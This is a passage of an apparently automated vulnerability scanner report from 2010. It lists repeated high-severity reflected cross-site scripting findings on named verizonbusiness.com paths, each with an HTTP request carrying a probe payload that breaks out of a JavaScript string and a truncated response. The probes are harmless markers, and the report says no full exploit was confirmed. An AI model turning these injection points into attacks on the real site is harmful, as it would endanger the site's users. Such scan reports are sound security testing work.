The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af0ae'%3b8c7c1db7e8c was submitted in the REST URL parameter 1. This input was echoed as af0ae';8c7c1db7e8c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsaf0ae'%3b8c7c1db7e8c/utility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:09 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsaf0ae';8c7c1db7e8c/utility/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1024. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/utility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69dc4"%3bbee51fff62d was submitted in the REST URL parameter 1. This input was echoed as 69dc4";bee51fff62d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions69dc4"%3bbee51fff62d/utility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:37 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions69dc4";bee51fff62d/utility/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.1025. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/utility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cf09"%3b69f6ac69368 was submitted in the REST URL parameter 2. This input was echoed as 7cf09";69f6ac69368 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/utility7cf09"%3b69f6ac69368/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41846
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/utility7cf09";69f6ac69368/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1026. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/utility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60ec1'%3b817df04f6f7 was submitted in the REST URL parameter 2. This input was echoed as 60ec1';817df04f6f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/utility60ec1'%3b817df04f6f7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41846
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/utility60ec1';817df04f6f7/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1027. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a4c4'%3b1c9321bb6b was submitted in the REST URL parameter 1. This input was echoed as 2a4c4';1c9321bb6b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions2a4c4'%3b1c9321bb6b/var/index.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:53 GMT
Content-Type: text/html
Content-Length: 40624
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions2a4c4';1c9321bb6b/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1028. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eacb4"%3b433fede53f0 was submitted in the REST URL parameter 1. This input was echoed as eacb4";433fede53f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionseacb4"%3b433fede53f0/var/index.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40626
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionseacb4";433fede53f0/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1029. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe593"%3b5b1995ad0ce was submitted in the REST URL parameter 2. This input was echoed as fe593";5b1995ad0ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/varfe593"%3b5b1995ad0ce/index.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41838
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/varfe593";5b1995ad0ce/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1030. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b42e'%3b80c0201122d was submitted in the REST URL parameter 2. This input was echoed as 9b42e';80c0201122d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/var9b42e'%3b80c0201122d/index.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:22 GMT
Content-Type: text/html
Content-Length: 41838
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/var9b42e';80c0201122d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1031. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1581'%3b14a37b19fc3 was submitted in the REST URL parameter 3. This input was echoed as d1581';14a37b19fc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/var/index.xmld1581'%3b14a37b19fc3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41838
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/var/index.xmld1581';14a37b19fc3'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1032. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a12c9"%3b5205fe0e469 was submitted in the REST URL parameter 3. This input was echoed as a12c9";5205fe0e469 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/var/index.xmla12c9"%3b5205fe0e469 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:35 GMT
Content-Type: text/html
Content-Length: 41840
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/var/index.xmla12c9";5205fe0e469";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1033. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6428"%3b3a27afbcd5c was submitted in the REST URL parameter 1. This input was echoed as e6428";3a27afbcd5c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionse6428"%3b3a27afbcd5c/wholesale/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:38 GMT
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionse6428";3a27afbcd5c/wholesale/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.1034. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68250'%3bdcf2f51b446 was submitted in the REST URL parameter 1. This input was echoed as 68250';dcf2f51b446 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions68250'%3bdcf2f51b446/wholesale/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions68250';dcf2f51b446/wholesale/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1035. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8159"%3b314cbd50019 was submitted in the REST URL parameter 2. This input was echoed as a8159";314cbd50019 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesalea8159"%3b314cbd50019/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41850
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesalea8159";314cbd50019/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

